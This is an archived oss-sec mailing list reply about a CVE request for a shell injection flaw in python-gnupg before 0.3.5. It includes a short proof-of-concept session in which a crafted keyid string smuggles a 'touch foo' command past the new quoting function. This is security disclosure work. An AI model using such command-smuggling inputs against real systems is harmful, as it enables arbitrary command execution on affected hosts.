oss-sec mailing list archives
Re: CVE request: python-gnupg before 0.3.5 shell injection
From: Matthew Daley <mattd () bugfuzz com>
Date: Tue, 4 Feb 2014 23:27:34 +1300
On Tue, Feb 4, 2014 at 11:04 PM, Henri Salo <henri () nerv fi> wrote:
On Tue, Feb 04, 2014 at 10:35:46AM +0100, Hanno Böck wrote:python-gnupg 0.3.5 lists in the changelog: "Added improved shell quoting to guard against shell injection." Sounds like a severe security issue, but further info is lacking.Diff attached. New function shell_quote() seems to represent major changes to shell input quoting against unsafe input. [...]
This appears to (at least) miss escaping of backslashes: $ ls foo ls: cannot access foo: No such file or directory $ python Python 2.7.6 (default, Jan 11 2014, 14:34:26) [GCC 4.8.2] on linux2 Type "help", "copyright", "credits" or "license" for more information.
import gnupg gnupg.GPG().sign_file(open("/dev/null"), "'\\\"; touch foo #'")
<gnupg.Sign object at 0x7fb3dbfad7d0>
$ ls foo foo - Matthew
Current thread:
- CVE request: python-gnupg before 0.3.5 shell injection Hanno Böck (Feb 04)
- Re: CVE request: python-gnupg before 0.3.5 shell injection Henri Salo (Feb 04)
- Re: CVE request: python-gnupg before 0.3.5 shell injection Florian Weimer (Feb 04)
- Re: CVE request: python-gnupg before 0.3.5 shell injection Henri Salo (Feb 04)
- Re: CVE request: python-gnupg before 0.3.5 shell injection Henri Salo (Feb 04)
- Re: CVE request: python-gnupg before 0.3.5 shell injection Florian Weimer (Feb 04)
- Re: CVE request: python-gnupg before 0.3.5 shell injection Vinay Sajip (Feb 05)
- Re: Re: CVE request: python-gnupg before 0.3.5 shell injection Florian Weimer (Feb 05)
- Re: CVE request: python-gnupg before 0.3.5 shell injection Vinay Sajip (Feb 05)
- Re: CVE request: python-gnupg before 0.3.5 shell injection Florian Weimer (Feb 04)
- Re: CVE request: python-gnupg before 0.3.5 shell injection Henri Salo (Feb 04)
- Re: CVE request: python-gnupg before 0.3.5 shell injection cve-assign (Feb 09)
- Re: Re: CVE request: python-gnupg before 0.3.5 shell injection Simon McVittie (Feb 10)
- Re: CVE request: python-gnupg before 0.3.5 shell injection cve-assign (Feb 12)